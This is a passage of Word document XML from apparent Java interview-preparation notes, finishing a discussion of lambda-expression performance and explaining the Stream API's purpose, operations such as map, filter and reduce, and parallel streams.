        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C01F79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code size, memory usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="7F3F2A81" w14:textId="77777777" w:rsidTr="00E80CEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B702E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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79A30D3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improve performance in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operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="46774249" w14:textId="77777777" w:rsidTr="00E80CEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="354E9F2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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="243CAAF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verage multiple cores for improved performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="7E615D01" w14:textId="77777777" w:rsidTr="00E80CEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6836B6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Optimization (invokedynamic)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="160CA6A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ad to more efficient method calls in some scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="6A1D7D05" w14:textId="77777777" w:rsidTr="00E80CEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7839EC7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 (first execution)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="613284C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ginal, typically negligible after first execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08520CC6"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C94DF6">
          <v:rect id="_x0000_i1771" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC0C73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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A8820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themselves don't provide </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>direct performance boosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, their usage encourages more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional programming paradigms</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., using streams and parallelism), which </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can improve performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the right scenarios, especially for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data-heavy tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The overall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duced boilerplat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JVM optimizations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> make lambda expressions a powerful tool in Java development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79731475" w14:textId="02A9252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72" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF4A760" w14:textId="77777777" w:rsidR="00500D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00500D6E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="257" w:name="_Toc197867471"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can you elaborate on the Stream API, purpose and use of it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="257"/>
    </w:p>
    <w:p w14:paraId="55BA5E81" w14:textId="733AFF58" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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tream API in Java: Purpose and Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C850A7"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Stream API</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a part of the java.util.stream package. It represents a sequence of elements that can be processed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equential</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Let's dive deeper into its </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>purpose</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advantages</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common use cases</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E199C1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Purpose of the Stream API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7786982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main purpose of the Stream API is to facilitate </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional-style operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on collections of data. It enables you to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018873B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rocess sequences of elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a declarative way (instead of using explicit iteration and conditional statements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACC72C5"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llow parallel execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for better performance, especially when dealing with large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405BE55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Support functional programming paradigms</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java, making code more concise, expressive, and readable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207AA7C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Main Features of Stream API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C826CD5"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equence of Elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A stream is a sequence of data elements that can be processed using a series of operations, such as map, filter, and reduce.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5295F96D"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iness</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserv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by default. That means computations are not executed until a terminal operation (like collect, forEach, or reduce) is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8EA07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Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The Stream API provides functional-style operations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flatMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, making the code more readable and concise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AED53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Streams support parallel operations, which allows you to process data in parallel and take advantage of multi-core processors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E366C9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Stream API Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F1570B"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The Stream API supports two types of operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA507A8"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ntermediate Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: These operations transform a stream into another stream, but they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they do not execute until a terminal operation is invoked). Examples include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F237685"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map()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E86B8E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ilter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416FBDDF"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distinct()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D3F2F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orted()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1C0D13"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Terminal Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: These operations produce a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>result</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ide effect</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like a collection, count, sum, etc.). They trigger the processing of the stream. Examples include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2E5FC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llect()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1C3E6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Each()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F923C8D"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reduce()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4829A5DE"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unt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CD1BC8"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nyMatch() / allMatch() / noneMatch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AF6ADF"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Common Stream Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA3D516"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Transforms each element in the stream using a provided function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B329DC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FDB03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squaredNumbers = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40241D8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448D8DB3"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0581D4B6" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="36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4, 9, 16]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CA04EF"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Filters elements in the stream based on a predicate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412C3538"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58026A8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evenNumbers = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBCA37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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D6F1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7B0CF7A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4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B84BB19"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Reduces the stream into a single value using an accumulator function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0A7F3A"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23BFC969"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t sum = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9E860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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F87AB6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0 (sum of numbers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C8775A"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ollect()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collects the elements of the stream into a collection (like a list or set).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9769B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EC0AB1C"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et&lt;Integer&gt; uniqueNumbers = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7071529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Set());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46799F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42EACF72"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orEach()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Applies a consumer function to each element in the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45251F7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C358E1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stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9820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0035175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0FCE4C3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5. How to Use the Stream API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784D9B83"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reating Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5453E323"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From Collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can convert any Collection (e.g., List, Set) to a stream using the stream() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313D8D02"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Arrays</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Arrays can also be converted into streams using Arrays.stream().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215750A8"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Stream.of()</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can create a stream directly from values using Stream.of().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBE091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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6F527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FBC091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tream&lt;Integer&gt; stream = numbers.stream();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB540B9"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xml:space="preserve">: Streams allow you to </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chain</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> multiple operations together to transform data in one flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6380C7B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5E7B388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result = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3835A7C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odd numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D736C3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           // Double them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500B66C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  // Collect into a list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6072B03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6, 10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE00D19"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6. Parallel Streams for Better Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7063320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By calling parallelStream() on a collection, you can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using multiple threads. This is especially useful for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expensive computations</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2882138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2132E5C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parallelStream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A4BED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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2339C12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79B4C658"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7. Advantages of the Stream API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A067F"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mproved Readability</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The Stream API allows you to write more declarative code, meaning the focus is on </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>what</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> should be done, not </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> it should be done. This leads to </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>simplified and more readable code</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1247F89A"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Stream operations can be chained together, which makes it easier to express complex operations in a single flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E18E3D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The Stream API provides the ability to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improving performance for large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE99C4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Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It promotes </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional programming concepts</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
